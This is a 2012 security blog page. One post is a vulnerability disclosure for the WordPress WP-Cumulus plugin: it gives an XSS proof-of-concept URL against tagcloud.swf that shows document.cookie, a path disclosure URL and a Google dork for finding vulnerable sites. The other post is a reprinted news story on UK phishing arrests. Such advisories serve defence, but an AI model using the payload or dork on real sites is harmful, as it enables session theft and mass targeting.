22 March 2012

Did you know that tagcloud.swf allows CrossSite Scripting?

I would like to warn you about security vulnerabilities in plugin WP-Cumulus for WordPress. These are Full path disclosure and Cross-Site Scripting vulnerabilities. Which is a web-application vulnerabilities which allow attackers to bypass client-side security mechanisms normally imposed on web content by modern web browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access-privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user.

Full path disclosure:

http://site/wp-content/plugins/wp-cumulus/wp-cumulus.php

XSS:

http://site/wp-content/plugins/wp-cumulus/tagcloud.
swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:
alert(document.cookie)'+style='font-size:
+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after click. It's strictly social XSS.
There are a lot of vulnerable tagcloud.swf file in Internet (according to Google): 

http://www.google.com.au/search?q=filetype:swf+inurl:tagcloud.swf

So to all flash developers, I recommend you to attend to security of their flash files. And for the owners of sites, with vulnerables flashes like tagcloud.swf, fix them  or turn over to your development team  to fix it. 
 
Kind Regards,
 
Alfredo Cedeno
IT Security Analyst & Advisor
http://ajcborges.blogspot.com 

21 March 2012

Phishing gang steals victim's life savings of $1.6M



The 12 men and two women were detained on Thursday morning in raids in London and the West Midlands. More arrests may follow in the coming days, according to Metropolitan Police Central eCrime Unit (PCeU) head Charlie McMurdie.


"These were dawn raids," McMurdie told ZDNet UK. "Enquiries are still ongoing regarding potential further arrests."

The phishing gang sent out unsolicited emails with links to a fake banking website. It used a series of bank accounts assigned to individual 'money mules' to launder £1m siphoned from the life-savings account of one woman who had divulged her details. The cash was transferred via the internet, the Metropolitan Police said in a statement.

"The stolen money was spent over a three-day period, after suspects embarked on a spending spree during the Christmas sales," the Met said. "The victim, a UK citizen currently living abroad after relocating to care for an ill relative, saw her savings disappear overnight after her bank account details were illegally obtained and unauthorised access to the account was gained."

The suspected 'money mule' launderers received between £9,000 and £75,000 each from the account. All of the 14 suspects were in custody at the time of writing, according to the Met.
 
Around 150 police officers were involved in the operation. They included members of the PCeU, 50 special constables, and police from three regional e-crime hubs in the East Midlands, York and Humber, and the North West.

"We wanted to make the best use of resources in relation to where the suspects were located," McMurdie said.

The police said the "sophisticated" phishing operation highlighted the need for people to take care when doing banking online, warning the public not to click on links in unsolicited emails.


"This is an example of how cybercrime creates real victims through the indiscriminate actions of the criminals involved," Detective Inspector Stewart Garrick said in the PCeU's statement.

Article Source.
Dawn raids net 14 suspects in £1m phishing thef
Security Threats | ZDNet UK http://goo.gl/MYzKu